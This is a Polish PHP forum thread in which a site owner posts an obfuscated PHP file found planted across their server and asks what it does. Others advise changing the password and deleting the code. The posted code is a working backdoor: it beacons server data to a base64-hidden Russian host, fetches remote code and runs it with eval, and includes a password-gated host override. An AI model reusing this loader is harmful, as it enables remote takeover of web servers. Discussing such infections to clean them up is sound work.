Włam na serwer? - Forum PHP.pl

Włam na serwer?, Proszę o sprawdzenie kodu

deha21 Zobacz profil	4.03.2011, 19:50:52 Post #1
Grupa: Zarejestrowani Postów: 544 Pomógł: 5 Dołączył: 18.08.2009 Ostrzeżenie: (0%)	Dziś na FTPie zobaczyłem dziwne pliku typu 14234.php w każdym z podkatalogów. A nich był taki kod: [PHP] pobierz, plaintext error_reporting(0); $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE); $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ=="); if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="efc1c2e5b4abb3c0af1b6ff7a20906a7") $f=$_REQUEST["id"]; if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c); else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c); else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z); curl_setopt($cu,CURLOPT_RETURNTRANSFER,1); $o=curl_exec($cu); curl_close($cu); eval($o);}; die(); [PHP] pobierz, plaintext Ktoś może mi powiedzieć co to jest? Ktoś chciał się włamać na serwer?

Odpowiedzi

Fifi209 Zobacz profil	4.03.2011, 20:00:50 Post #2
Grupa: Zarejestrowani Postów: 4 655 Pomógł: 556 Dołączył: 17.03.2009 Skąd: Katowice Ostrzeżenie: (0%)	Zacznij od zmiany hasła, potem od usuwania kodu. btw na macu to wirusów nie ma? jakaś nowość. Ten post edytował fifi209 4.03.2011, 20:01:08

deha21 Zobacz profil	4.03.2011, 20:11:17 Post #3
Grupa: Zarejestrowani Postów: 544 Pomógł: 5 Dołączył: 18.08.2009 Ostrzeżenie: (0%)	Ok zmienione, tak na wszelki wypadek. Co to kod miał za zadanie zrobić? Cytat(fifi209 @ 4.03.2011, 20:00:50 ) btw na macu to wirusów nie ma? jakaś nowość. Są ale jest ich na pewno mniej i są rzadziej spotykane. Poza tym chyba ciężko dorzucić wirusa do programu który jest oryginalny i od ponad roku nie sprawiał problemów?

Posty w temacie

deha21 Włam na serwer? 4.03.2011, 19:50:52

fifi209 Zgadnę, że łączysz się przez total commandera, fil... 4.03.2011, 19:53:54

deha21 Cytat(fifi209 @ 4.03.2011, 19:53:54 )... 4.03.2011, 19:58:45

fifi209 Zacznij od zmiany hasła, potem od usuwania kodu. ... 4.03.2011, 20:00:50

deha21 Ok zmienione, tak na wszelki wypadek. Co to kod mi... 4.03.2011, 20:11:17

erix ~fifi209, to że ktoś z TC korzysta, to nie znaczy,... 4.03.2011, 20:56:24

kiler129 Cytat(erix @ 4.03.2011, 20:56:24 ) ~f... 5.03.2011, 02:33:28

« Następny starszy · PHP · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 30.12.2025 - 15:36

Hosting zapewnia